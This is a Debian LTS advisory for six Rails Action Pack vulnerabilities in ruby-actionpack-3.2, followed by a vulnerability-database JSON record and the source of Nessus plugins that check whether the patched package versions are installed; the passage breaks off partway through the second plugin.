Multiple vulnerabilities have been discovered in ruby-actionpack-3.2, a
web-flow and rendering framework and part of Rails:
* [CVE-2015-7576](https://security-tracker.debian.org/tracker/CVE-2015-7576)
A flaw was found in the way the Action Controller component compared
user names and passwords when performing HTTP basic
authentication. Time taken to compare strings could differ depending
on input, possibly allowing a remote attacker to determine valid user
names and passwords using a timing attack.
* [CVE-2016-0751](https://security-tracker.debian.org/tracker/CVE-2016-0751)
A flaw was found in the way the Action Pack component performed MIME
type lookups. Since queries were cached in a global cache of MIME
types, an attacker could use this flaw to grow the cache indefinitely,
potentially resulting in a denial of service.
* [CVE-2016-0752](https://security-tracker.debian.org/tracker/CVE-2016-0752)
A directory traversal flaw was found in the way the Action View
component searched for templates for rendering. If an application
passed untrusted input to the render method, a remote,
unauthenticated attacker could use this flaw to render unexpected
files and, possibly, execute arbitrary code.
* [CVE-2016-2097](https://security-tracker.debian.org/tracker/CVE-2016-2097)
Crafted requests to Action View might result in rendering files from
arbitrary locations, including files beyond the application's view
directory. This vulnerability is the result of an incomplete fix of
[CVE-2016-0752](https://security-tracker.debian.org/tracker/CVE-2016-0752).
This bug was found by Jyoti Singh and Tobias Kraze
from Makandra.
* [CVE-2016-2098](https://security-tracker.debian.org/tracker/CVE-2016-2098)
If a web applications does not properly sanitize user inputs, an
attacker might control the arguments of the render method in a
controller or a view, resulting in the possibility of executing
arbitrary ruby code. This bug was found by Tobias Kraze from
Makandra and joernchen of Phenoelit.
* [CVE-2016-6316](https://security-tracker.debian.org/tracker/CVE-2016-6316)
Andrew Carpenter of Critical Juncture discovered a cross-site
scripting vulnerability affecting Action View. Text declared as HTML
safe will not have quotes escaped when used as attribute values in
tag helpers.
For Debian 7 Wheezy, these problems have been fixed in version
3.2.6-6+deb7u3.
We recommend that you upgrade your ruby-actionpack-3.2 packages.
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: <https://wiki.debian.org/LTS>
{"id": "OSV:DLA-604-1", "bulletinFamily": "software", "title": "ruby-actionpack-3.2 - security update", "description": "\nMultiple vulnerabilities have been discovered in ruby-actionpack-3.2, a\nweb-flow and rendering framework and part of Rails:\n\n\n* [CVE-2015-7576](https://security-tracker.debian.org/tracker/CVE-2015-7576)\nA flaw was found in the way the Action Controller component compared\n user names and passwords when performing HTTP basic\n authentication. Time taken to compare strings could differ depending\n on input, possibly allowing a remote attacker to determine valid user\n names and passwords using a timing attack.\n* [CVE-2016-0751](https://security-tracker.debian.org/tracker/CVE-2016-0751)\nA flaw was found in the way the Action Pack component performed MIME\n type lookups. Since queries were cached in a global cache of MIME\n types, an attacker could use this flaw to grow the cache indefinitely,\n potentially resulting in a denial of service.\n* [CVE-2016-0752](https://security-tracker.debian.org/tracker/CVE-2016-0752)\nA directory traversal flaw was found in the way the Action View\n component searched for templates for rendering. If an application\n passed untrusted input to the render method, a remote,\n unauthenticated attacker could use this flaw to render unexpected\n files and, possibly, execute arbitrary code.\n* [CVE-2016-2097](https://security-tracker.debian.org/tracker/CVE-2016-2097)\nCrafted requests to Action View might result in rendering files from\n arbitrary locations, including files beyond the application's view\n directory. This vulnerability is the result of an incomplete fix of\n [CVE-2016-0752](https://security-tracker.debian.org/tracker/CVE-2016-0752). \n This bug was found by Jyoti Singh and Tobias Kraze\n from Makandra.\n* [CVE-2016-2098](https://security-tracker.debian.org/tracker/CVE-2016-2098)\nIf a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code. This bug was found by Tobias Kraze from\n Makandra and joernchen of Phenoelit.\n* [CVE-2016-6316](https://security-tracker.debian.org/tracker/CVE-2016-6316)\nAndrew Carpenter of Critical Juncture discovered a cross-site\n scripting vulnerability affecting Action View. Text declared as HTML\n safe will not have quotes escaped when used as attribute values in\n tag helpers.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n3.2.6-6+deb7u3.\n\n\nWe recommend that you upgrade your ruby-actionpack-3.2 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "published": "2016-08-28T00:00:00", "modified": "2022-08-05T05:19:42", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH"}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://osv.dev/vulnerability/DLA-604-1", "reporter": "Google", "references": ["https://www.debian.org/lts/security/2016/dla-604"], "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-2098", "CVE-2016-0752", "CVE-2016-6316", "CVE-2016-2097"], "immutableFields": [], "type": "osv", "lastseen": "2022-08-05T05:19:46", "edition": 1, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"idList": ["GITLAB-9ADCD46F0341E983FC7C5F296E742944", "GITLAB-4592157653D70634A228B2043D8242B2", "GITLAB-5AFFD2F604C9B362DF159A3A4228C4BC"], "type": "gitlab"}, {"idList": ["FEDORA:2B32A60560AC", "FEDORA:287396078F7C", "FEDORA:8EFB06087D79", "FEDORA:C3F056065295", "FEDORA:837166087EC2", "FEDORA:335C96042D4E", "FEDORA:4CEEE6059FC3", "FEDORA:034186092201", "FEDORA:16C07609221C", "FEDORA:CDE8860679E9", "FEDORA:2B7856042D4C", "FEDORA:EB70F608B5E9", "FEDORA:909536087ECC", "FEDORA:3C1406042D4F", "FEDORA:62D2F605A0F1", "FEDORA:23278608B5EB", "FEDORA:732356042D46", "FEDORA:45DE46042D51", "FEDORA:9D8B2608A217", "FEDORA:072A56042D49", "FEDORA:4E7DE6087A83", "FEDORA:10928605A0F3", "FEDORA:7E33C6042D49"], "type": "fedora"}, {"idList": ["RHSA-2016:1857", "RHSA-2016:1858", "RHSA-2016:0456", "RHSA-2016:1855", "RHSA-2016:0296", "RHSA-2016:0455", "RHSA-2016:1856", "RHSA-2016:0454"], "type": "redhat"}, {"idList": ["UB:CVE-2016-0751", "UB:CVE-2016-0752", "UB:CVE-2016-2098", "UB:CVE-2016-6316", "UB:CVE-2015-7576", "UB:CVE-2016-2097"], "type": "ubuntucve"}, {"idList": ["1337DAY-ID-25434", "1337DAY-ID-25576"], "type": "zdt"}, {"idList": ["OSV:GHSA-XRR4-P6FQ-HJG7", "OSV:GHSA-FFPV-C4HM-3X6V", "OSV:GHSA-VX9J-46RH-FQR8", "OSV:GHSA-78RC-8C29-P45G", "OSV:GHSA-P692-7MM3-3FXG", "OSV:DSA-3651-1", "OSV:GHSA-PC3M-V286-2JWJ", "OSV:DSA-3509-1", "OSV:DSA-3464-1", "OSV:DLA-603-1"], "type": "osv"}, {"idList": ["SSV:90633", "SSV:91076", "SSV:91073"], "type": "seebug"}, {"idList": ["RAILS_ACTIONPACK_RENDER"], "type": "canvas"}, {"idList": ["PACKETSTORM:139143", "PACKETSTORM:137834"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310807435", "OPENVAS:1361412562310851240", "OPENVAS:1361412562310703651", "OPENVAS:1361412562310807704", "OPENVAS:1361412562310871890", "OPENVAS:1361412562310703509", "OPENVAS:1361412562310809171", "OPENVAS:1361412562310809355", "OPENVAS:1361412562310872047", "OPENVAS:703509", "OPENVAS:1361412562310871981", "OPENVAS:1361412562310871937", "OPENVAS:1361412562310872011", "OPENVAS:703651", "OPENVAS:1361412562310807380", "OPENVAS:1361412562310809352", "OPENVAS:1361412562310871965", "OPENVAS:1361412562310810599", "OPENVAS:1361412562310809354", "OPENVAS:1361412562310872038", "OPENVAS:1361412562310809353", "OPENVAS:1361412562310872008", "OPENVAS:1361412562310807438", "OPENVAS:1361412562310872056", "OPENVAS:1361412562310809356", "OPENVAS:1361412562310703464", "OPENVAS:1361412562310809170", "OPENVAS:1361412562310807706", "OPENVAS:1361412562310807379", "OPENVAS:703464", "OPENVAS:1361412562310872094", "OPENVAS:1361412562310809357", "OPENVAS:1361412562310851251", "OPENVAS:1361412562310807434", "OPENVAS:1361412562310807436"], "type": "openvas"}, {"idList": ["H1:94568", "H1:46019", "H1:113928", "H1:113831"], "type": "hackerone"}, {"idList": ["F4CB340412A2CB363B4E3389C6065B45CE9BC3FFC09E2D04AB7B774F53DE8A3A", "E7183AB173010AD555253E1C8255AC6DD7B1D2F6B9E8F805A55734163D6C20F2"], "type": "ibm"}, {"idList": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-2098", "CVE-2016-0752", "CVE-2016-6316", "CVE-2016-2097"], "type": "cve"}, {"idList": ["DEBIAN:DSA-3509-1:F91B9", "DEBIAN:DSA-3464-1:09CC2", "DEBIAN:DSA-3651-1:ADB0B", "DEBIAN:DSA-3509-1:A094D", "DEBIAN:DLA-604-1:2A425", "DEBIAN:DSA-3509-1:D7374", "DEBIAN:DSA-3509-1:F9416", "DEBIAN:DLA-603-1:FFD85", "DEBIAN:DSA-3651-1:9DFD3"], "type": "debian"}, {"idList": ["RH:CVE-2016-6316"], "type": "redhatcve"}, {"idList": ["AKB:4EA397A4-8D97-487F-A877-0376D1F51826", "AKB:2DE37106-01B7-46BE-8BCC-B5F819F9225D"], "type": "attackerkb"}, {"idList": ["GHSA-XRR4-P6FQ-HJG7", "GHSA-PC3M-V286-2JWJ", "GHSA-78RC-8C29-P45G", "GHSA-P692-7MM3-3FXG", "GHSA-FFPV-C4HM-3X6V", "GHSA-VX9J-46RH-FQR8", "GHSA-2PWF-XWR3-HP55"], "type": "github"}, {"idList": ["OPENSUSE-SU-2016:0790-1", "OPENSUSE-SU-2016:0835-1", "SUSE-SU-2016:1146-1", "SUSE-SU-2016:0867-1", "SUSE-SU-2016:0967-1", "SUSE-SU-2016:0854-1"], "type": "suse"}, {"idList": ["DEBIANCVE:CVE-2015-7576", "DEBIANCVE:CVE-2016-2098", "DEBIANCVE:CVE-2016-6316", "DEBIANCVE:CVE-2016-2097", "DEBIANCVE:CVE-2016-0751", "DEBIANCVE:CVE-2016-0752"], "type": "debiancve"}, {"idList": ["THREATPOST:82E1359D397101F2CCA1968657708DB7"], "type": "threatpost"}, {"idList": ["EDB-ID:40561"], "type": "exploitdb"}, {"idList": ["CPAI-2016-1173", "CPAI-2016-0626"], "type": "checkpoint_advisories"}, {"idList": ["43F1C867-654A-11E6-8286-00248C0C745D", "5A016DD0-8AA8-490E-A596-55F4CC17E4EF", "BB0EF21D-0E1B-461B-BC3D-9CBA39948888"], "type": "freebsd"}, {"idList": ["RUBY:ACTIONPACK-2015-7576", "RUBY:ACTIONPACK-2016-2097", "RUBY:ACTIONVIEW-2016-0752", "RUBY:ACTIONPACK-2016-0751", "RUBY:ACTIONVIEW-2016-2097", "RUBY:ACTIONPACK-2016-0752", "RUBY:ACTIONPACK-2016-2098"], "type": "rubygems"}, {"idList": ["OPENSUSE-2016-160.NASL", "FEDORA_2016-F486068393.NASL", "DEBIAN_DLA-604.NASL", "FEDORA_2016-5760339E76.NASL", "OPENSUSE-2016-159.NASL", "FEDORA_2016-0D9890F7B5.NASL", "FREEBSD_PKG_43F1C867654A11E6828600248C0C745D.NASL", "FEDORA_2016-CB30088B06.NASL", "OPENSUSE-2016-369.NASL", "FEDORA_2016-AB8BF51CF3.NASL", "FEDORA_2016-FA0DEC2360.NASL", "FREEBSD_PKG_BB0EF21D0E1B461BBC3D9CBA39948888.NASL", "DEBIAN_DSA-3464.NASL", "DEBIAN_DLA-603.NASL", "FEDORA_2016-3EDE04CD79.NASL", "MACOS_SERVER_5_3.NASL", "FEDORA_2016-3954061E32.NASL", "FREEBSD_PKG_5A016DD08AA8490EA59655F4CC17E4EF.NASL", "OPENSUSE-2016-352.NASL", "DEBIAN_DSA-3651.NASL", "FEDORA_2016-94E71EE673.NASL", "FEDORA_2016-97002AD37B.NASL", "FEDORA_2016-F6AF14570F.NASL", "DEBIAN_DSA-3509.NASL"], "type": "nessus"}, {"idList": ["SAINT:CE3D4DD89AD93E07E9236060DF64D24F", "SAINT:C60C9FE23283E404383AF2811DAC7B9A", "SAINT:627CB79E1D20B9CA5F6ED2D62D3FF6BB"], "type": "saint"}, {"idList": ["MSF:EXPLOIT-MULTI-HTTP-RAILS_DYNAMIC_RENDER_CODE_EXEC-"], "type": "metasploit"}, {"idList": ["KITPLOIT:2401425074991132396"], "type": "kitploit"}, {"idList": ["APPLE:B9A45A59599AAB4A4CDF843F56D06965", "APPLE:HT207604"], "type": "apple"}]}, "score": {"value": 0.2, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "ruby-actionpack-3.2", "version": 3}, {"name": "ruby-actionpack-3.2", "version": 3}, {"name": "ruby-actionpack-3.2", "version": 3}]}, "epss": [{"cve": "CVE-2015-7576", "epss": "0.018940000", "percentile": "0.866440000", "modified": "2023-03-20"}, {"cve": "CVE-2016-0751", "epss": "0.009980000", "percentile": "0.812920000", "modified": "2023-03-20"}, {"cve": "CVE-2016-2098", "epss": "0.943540000", "percentile": "0.986830000", "modified": "2023-03-20"}, {"cve": "CVE-2016-0752", "epss": "0.973790000", "percentile": "0.998110000", "modified": "2023-03-20"}, {"cve": "CVE-2016-6316", "epss": "0.002150000", "percentile": "0.577850000", "modified": "2023-03-20"}, {"cve": "CVE-2016-2097", "epss": "0.010990000", "percentile": "0.822100000", "modified": "2023-03-20"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1660004461, "score": 1660007483, "affected_software_major_version": 1666703109, "epss": 1679338714}, "_internal": {"score_hash": "ea3d6f45810330f44f026d03c427dc65"}, "affectedSoftware": [{"name": "ruby-actionpack-3.2", "operator": "eq", "version": "3.2.6-6"}, {"name": "ruby-actionpack-3.2", "operator": "eq", "version": "3.2.6-6+deb7u2"}, {"name": "ruby-actionpack-3.2", "operator": "eq", "version": "3.2.6-6+deb7u1"}]}
{"nessus": [{"lastseen": "2021-08-19T12:40:35", "description": "Multiple vulnerabilities have been discovered in ruby-actionpack-3.2, a web-flow and rendering framework and part of Rails :\n\nCVE-2015-7576\n\nA flaw was found in the way the Action Controller component compared user names and passwords when performing HTTP basic authentication.\nTime taken to compare strings could differ depending on input, possibly allowing a remote attacker to determine valid user names and passwords using a timing attack.\n\nCVE-2016-0751\n\nA flaw was found in the way the Action Pack component performed MIME type lookups. Since queries were cached in a global cache of MIME types, an attacker could use this flaw to grow the cache indefinitely, potentially resulting in a denial of service.\n\nCVE-2016-0752\n\nA directory traversal flaw was found in the way the Action View component searched for templates for rendering. If an application passed untrusted input to the 'render' method, a remote, unauthenticated attacker could use this flaw to render unexpected files and, possibly, execute arbitrary code.\n\nCVE-2016-2097\n\nCrafted requests to Action View might result in rendering files from arbitrary locations, including files beyond the application's view directory. This vulnerability is the result of an incomplete fix of CVE-2016-0752. This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\n\nIf a web applications does not properly sanitize user inputs, an attacker might control the arguments of the render method in a controller or a view, resulting in the possibility of executing arbitrary ruby code. This bug was found by Tobias Kraze from Makandra and joernchen of Phenoelit.\n\nCVE-2016-6316\n\nAndrew Carpenter of Critical Juncture discovered a cross-site scripting vulnerability affecting Action View. Text declared as 'HTML safe' will not have quotes escaped when used as attribute values in tag helpers.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 3.2.6-6+deb7u3.\n\nWe recommend that you upgrade your ruby-actionpack-3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "Debian DLA-604-1 : ruby-actionpack-3.2 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098", "CVE-2016-6316"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby-actionpack-3.2", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-604.NASL", "href": "https://www.tenable.com/plugins/nessus/93132", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-604-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93132);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-2097\", \"CVE-2016-2098\", \"CVE-2016-6316\");\n\n script_name(english:\"Debian DLA-604-1 : ruby-actionpack-3.2 security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in ruby-actionpack-3.2,\na web-flow and rendering framework and part of Rails :\n\nCVE-2015-7576\n\nA flaw was found in the way the Action Controller component compared\nuser names and passwords when performing HTTP basic authentication.\nTime taken to compare strings could differ depending on input,\npossibly allowing a remote attacker to determine valid user names and\npasswords using a timing attack.\n\nCVE-2016-0751\n\nA flaw was found in the way the Action Pack component performed MIME\ntype lookups. Since queries were cached in a global cache of MIME\ntypes, an attacker could use this flaw to grow the cache indefinitely,\npotentially resulting in a denial of service.\n\nCVE-2016-0752\n\nA directory traversal flaw was found in the way the Action View\ncomponent searched for templates for rendering. If an application\npassed untrusted input to the 'render' method, a remote,\nunauthenticated attacker could use this flaw to render unexpected\nfiles and, possibly, execute arbitrary code.\n\nCVE-2016-2097\n\nCrafted requests to Action View might result in rendering files from\narbitrary locations, including files beyond the application's view\ndirectory. This vulnerability is the result of an incomplete fix of\nCVE-2016-0752. This bug was found by Jyoti Singh and Tobias Kraze from\nMakandra.\n\nCVE-2016-2098\n\nIf a web applications does not properly sanitize user inputs, an\nattacker might control the arguments of the render method in a\ncontroller or a view, resulting in the possibility of executing\narbitrary ruby code. This bug was found by Tobias Kraze from Makandra\nand joernchen of Phenoelit.\n\nCVE-2016-6316\n\nAndrew Carpenter of Critical Juncture discovered a cross-site\nscripting vulnerability affecting Action View. Text declared as 'HTML\nsafe' will not have quotes escaped when used as attribute values in\ntag helpers.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.6-6+deb7u3.\n\nWe recommend that you upgrade your ruby-actionpack-3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/08/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/ruby-actionpack-3.2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected ruby-actionpack-3.2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionpack-3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"ruby-actionpack-3.2\", reference:\"3.2.6-6+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:35:01", "description": "Two vulnerabilities have been discovered in Rails, a web application framework written in Ruby. Both vulnerabilities affect Action Pack, which handles the web requests for Rails.\n\n - CVE-2016-2097 Crafted requests to Action View, one of the components of Action Pack, might result in rendering files from arbitrary locations, including files beyond the application's view directory. This vulnerability is the result of an incomplete fix of CVE-2016-0752. This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\n - CVE-2016-2098 If a web applications does not properly sanitize user inputs, an attacker might control the arguments of the render method in a controller or a view, resulting in the possibility of executing arbitrary ruby code. This bug was found by Tobias Kraze from Makandra and joernchen of Phenoelit.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-10T00:00:00", "type": "nessus", "title": "Debian DSA-3509-1 : rails - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097", "CVE-2016-2098"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3509.NASL", "href": "https://www.tenable.com/plugins/nessus/89791", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3509. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89791);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2097\", \"CVE-2016-2098\");\n script_xref(name:\"DSA\", value:\"3509\");\n\n script_name(english:\"Debian DSA-3509-1 : rails - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack,\nwhich handles the web requests for Rails.\n\n - CVE-2016-2097\n Crafted requests to Action View, one of the components\n of Action Pack, might result in rendering files from\n arbitrary locations, including files beyond the\n application's view directory. This vulnerability is the\n result of an incomplete fix of CVE-2016-0752. This bug\n was found by Jyoti Singh and Tobias Kraze from Makandra.\n\n - CVE-2016-2098\n If a web applications does not properly sanitize user\n inputs, an attacker might control the arguments of the\n render method in a controller or a view, resulting in\n the possibility of executing arbitrary ruby code. This\n bug was found by Tobias Kraze from Makandra and\n joernchen of Phenoelit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-0752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-2098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/rails\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3509\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the rails packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 2:4.1.8-1+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"rails\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionpack\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-actionview\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activemodel\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activerecord\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport\", reference:\"2:4.1.8-1+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby-activesupport-2.3\", 